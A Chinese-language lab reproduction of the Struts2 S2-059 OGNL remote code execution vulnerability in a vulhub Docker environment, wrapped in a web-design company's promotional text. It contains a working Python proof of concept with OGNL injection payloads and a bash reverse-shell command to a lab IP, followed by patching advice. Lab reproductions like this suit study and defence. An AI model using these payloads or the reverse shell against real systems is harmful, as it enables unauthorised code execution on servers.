今天就跟大家聊聊有關(guān)Struts2 S2-059 遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn)是怎么樣的,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結(jié)了以下內(nèi)容,希望大家根據(jù)這篇文章可以有所收獲。
公司主營業(yè)務(wù):成都做網(wǎng)站、成都網(wǎng)站設(shè)計(jì)、移動(dòng)網(wǎng)站開發(fā)等業(yè)務(wù)。幫助企業(yè)客戶真正實(shí)現(xiàn)互聯(lián)網(wǎng)宣傳,提高企業(yè)的競(jìng)爭(zhēng)能力。成都創(chuàng)新互聯(lián)是一支青春激揚(yáng)、勤奮敬業(yè)、活力青春激揚(yáng)、勤奮敬業(yè)、活力澎湃、和諧高效的團(tuán)隊(duì)。公司秉承以“開放、自由、嚴(yán)謹(jǐn)、自律”為核心的企業(yè)文化,感謝他們對(duì)我們的高要求,感謝他們從不同領(lǐng)域給我們帶來的挑戰(zhàn),讓我們激情的團(tuán)隊(duì)有機(jī)會(huì)用頭腦與智慧不斷的給客戶帶來驚喜。成都創(chuàng)新互聯(lián)推出五河免費(fèi)做網(wǎng)站回饋大家。
Struts2 是 Apache 軟件組織推出的一個(gè)相當(dāng)強(qiáng)大的 Java Web 開源框架,本質(zhì)上相當(dāng)于一個(gè) servlet。Struts2 基于 MVC 架構(gòu),框架結(jié)構(gòu)清晰。通常作為控制器(Controller)來建立模型與視圖的數(shù)據(jù)交互,用于創(chuàng)建企業(yè)級(jí) Java web 應(yīng)用程序,它利用并延伸了Java Servlet API,鼓勵(lì)開發(fā)者采用MVC架構(gòu)。Struts2以WebWork優(yōu)秀的設(shè)計(jì)思想為核心,吸收了Struts框架的部分優(yōu)點(diǎn),提供了一個(gè)更加整潔的MVC設(shè)計(jì)模式實(shí)現(xiàn)的Web應(yīng)用程序框架。
攻擊者可以通過構(gòu)造惡意的OGNL表達(dá)式,并將其設(shè)置到可被外部輸入進(jìn)行修改,且會(huì)執(zhí)行OGNL表達(dá)式的Struts2標(biāo)簽的屬性值,引發(fā)OGNL表達(dá)式解析,最終造成遠(yuǎn)程代碼執(zhí)行的影響。
Struts 2.0.0 – Struts 2.5.20
1.本次漏洞環(huán)境使用vulhub快速搭建,vulhub下載地址如下:
https://github.com/vulhub/vulhub
cd vulhub-master/struts2/s2-059
2.使用docker-compose快速構(gòu)建靶場(chǎng)環(huán)境
docker-compose up -d
3.啟動(dòng)完成后在瀏覽器訪問http://ip:8080/?id=1 就可以看到測(cè)試界面
1.在瀏覽器訪問http://ip:8080/?id=%25{88*88},可以發(fā)現(xiàn)執(zhí)行的88*88成功被解析了,會(huì)執(zhí)行OGNL表達(dá)式的Struts2標(biāo)簽的屬性值,引發(fā)OGNL表達(dá)式解析。
2.使用poc來反彈shell,反彈shell的payload需要使用base64編碼
bash -i >& /dev/tcp/172.16.1.132/9967 0>&1
base64編碼網(wǎng)址:
http://www.jackson-t.ca/runtime-exec-payloads.html
import requests url = "http://127.0.0.1:8080" data1 = { "id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}" } data2 = { "id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('payload-base64編碼'))}" } res1 = requests.post(url, data=data1) res2 = requests.post(url, data=data2) |
3.修改poc中的payload為自己的payload,然后使用python運(yùn)行,可以看到反彈了shell
1.升級(jí)到Struts 2.5.22或更高版本
2. 開啟ONGL表達(dá)式注入保護(hù)措施。
https://struts.apache.org/security/#proactively-protect-from-ognl-expression-injections-attacks-if-easily-applicable
看完上述內(nèi)容,你們對(duì)Struts2 S2-059 遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn)是怎么樣的有進(jìn)一步的了解嗎?如果還想了解更多知識(shí)或者相關(guān)內(nèi)容,請(qǐng)關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道,感謝大家的支持。
分享名稱:Struts2S2-059遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn)是怎么樣的
當(dāng)前URL:http://aaarwkj.com/article12/pdeggc.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供服務(wù)器托管、移動(dòng)網(wǎng)站建設(shè)、網(wǎng)站營銷、全網(wǎng)營銷推廣、域名注冊(cè)、定制網(wǎng)站
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來源: 創(chuàng)新互聯(lián)